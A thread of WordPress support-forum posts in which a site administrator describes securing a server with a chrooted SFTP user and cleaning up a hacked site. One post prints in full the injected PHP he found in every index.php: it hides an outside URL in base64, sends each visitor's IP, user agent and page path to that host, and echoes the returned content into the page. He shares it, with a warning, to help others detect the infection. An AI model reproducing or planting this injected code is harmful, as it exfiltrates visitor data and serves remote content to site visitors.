GaryDev

Update:

I went into the ‘virtual server’ location where wordpress was installed, and changed both the owner and group for all files and folders. This was done using command prompt access by issuing the command “chown -rH UserOwnerName:GroupName /var/www/htmlwebsiteInstance”

So for example, if the owner of the site is say the user account Fred and the group Fred is in is www-data and the instance of the website is called FredsSite, use the command

chown -rH Fred:www-data /var/www/FredsSite

As a side note, the user “Fred” was created in Webmin users & groups configuration, was given a very strong password, and had their initial directory specified to be /var/www/FredsSite, and a shell was setup to be bin/bash.

I then edited the SSH server configuration file, again using the Webmin tools, and added in the following text:

Match user Fred
# The following two directives force Fred to become chrooted
# and only have sftp available. No other chroot setup is required.
ChrootDirectory /var/www/FredsSite/
ForceCommand internal-sftp
# For additional paranoia, disallow all types of port forwardings.
# AllowTcpForwarding no
# GatewayPorts no
# X11Forwarding no

Note, the above comes from another websites instruction page, and states that this will allow SFTP connections. In my case, under Ubuntu 10.4 LTS, the SFTP login was not accepted, and I had to revert to plain FTP in order to connect in using WinSCP. Not THAT big of a detail but, I’m just saying this is what I found. If someone has a hint that will allow the SFTP side to work, I’d appreciate the advice.

Anyway, to continue on… I then edited the wordpress config file, and stored the appropriate commands to allow the website owner the ability to not have to enter the FTP commands for getting and installing updates. In my case, it was important to use the full domain name rather than “localhost” as the connection for FTP. This is described in http://codex.wordpress.org/Editing_wp-config.php

With these changes made, Fred can now login to the administration side of the wordpress system, and updates for plugins etc, are now correctly downloaded and installed without issues.

I checked virtualmin, basically an add-on for webmin, which I use. Doing a quick glance over the docs for it, it would seem like it creates a new virtual machine, totally independent of main machine. I could be wrong in this presumption.

I don’t want a VM within a VM… the apache web server has already created a “virtual” website, which works fine. We have a total of 3 different web sites running, including the main system site. Naturally, I fear adding in virtualmin at this point, because if it does make “isolated” machines, then I will lose everything that is setup now. Again, I could be wrong…

For what it’s worth, there are no mail services installed other than sendmail for the base system. None of the other 2 websites have any specific email setups. All email is processed by other sources. And wordpress has no issues with sending email notifications since I’ve already received a pile of them about spam comments.. (lol/sigh)

Just sayin 🙂

No question WinGrep does a lot more. 🙂 For my purposes, way more than I needed…

With that said, the above link now also contains the full source code for the program.

To each their own. 🙂

Gary

(btw, if the Mods want to extract the functions/text/links here, and put it into a sticky some place, be my guest. My only goal was to offer back to the community something that was valuable to me. Cheers!)

Nice… 🙂 The key of course, is the shell access. And hoping you did it right. Of course, one made a backup before too, right? LOL.

Doing this stuff is scarey for many people who don’t understand things, and maybe working in a Windows environment on backup site files (the smart thing to do always.. the backups, not windows)

I did write a simple utility for windows folks, the post is here:

http://wordpress.org/support/topic/site-hack-fixing

Hoping someone from the WordPress group will be able to take my stuff and offer it up.

For the Mod, thanks for the understanding.

Question for Mickey 🙂 You’ve (and others) been quite patient, I must say thanks to all for the advice and assistance.

I know the ‘bulk’ of this issue is based on the timthumb.php file, and I’ve made sure those were updated to the latest code. I found the hacked results code to appear in both index.php and footer.php (in pretty much every folder where there are those files). I’ve been asked to look at a few more sites (outside of the main server I was working on) that have the same hack code running, and I’ve done a search using cPanel file manager for ‘thumb’ and I’ve found no thumb.php or timthumb.php any where. Clearly there is more happening… are you aware of other things that are also being done to cause this? I’m not sure what to google… if you have a link or two that can point me in the right direction, I’d deeply appreciate it.

Thanks again. 🙂

Gary

Well.. I have some progress to report. The site lead (I think) must have made some plugin changes (still checking) but the problem boils down to the main index.php file. The normal code is only a few lines long

define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

In our case there were many extras there, and the appearance made by the code made you think “oh, ok.. google stuff”… I will put the code into a code box, so you can see what it was… I will strip off any of the php tags. Naturally, without saying… dont RUN this code, but hopefully it will assist others in finding ‘bad’ things.

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}

I’m guessing the big ‘problem’ is the line that does the base64 stuff, and I still don’t know yet what caused it… For the forum operators, if that code is “too much”, I apologize in advance, please feel free to edit it as needed. My only intention is to show what was going on, and where it was found.

NOTE.. this code was in ALL of the index.php files in the various folders… make sure you check them all.

hmmm… Interesting. Thanks for the tip on the scanner. I will keep on digging for sure. I administer a gaming website system, Linux box on a VM and I have full root access. Which includes full DB and well, everything. 🙂 The WP site, I can only FTP into the root of the website, and I have no other access (yet).

The script file has been attached to after the closing html tag, and it’s there trying to do it’s dirty work even when logging in directly to the admin section. So that tells me it’s actually on every page generated. The key now, is to find out exactly what is causing it.

I can’t do a full wipe and re-install due to the DB access side, but I did upgrade Nextgen and the theme to the latest releases. I don’t want to run the full wp 3.3.3 update yet. I am more interested in just how it got in, where it’s being stored at.

I have the ‘malware’ site blocked by using peer guardian, so it’s not affecting my system (thankfully)… until I did that, it was sure causing a lot of grief with FireFox. I originally found it from MalwareBytes program, which monitors things… and while it stopped the outgoing side, it still affected Firefox badly. Now that it’s blocked on the main local computer here, I hope to have more luck in finding it.

I’ve also noticed a HUGE increase in Apache HTML errors (on the gaming site where WP is NOT installed)… Have at least three systems now, all appear to be running the same script files to attack with.

*sigh*

Thanks for the response, I will take a look at modifying the function code to grab the thumbs… I had thought it was supposed to do that already but apparently not.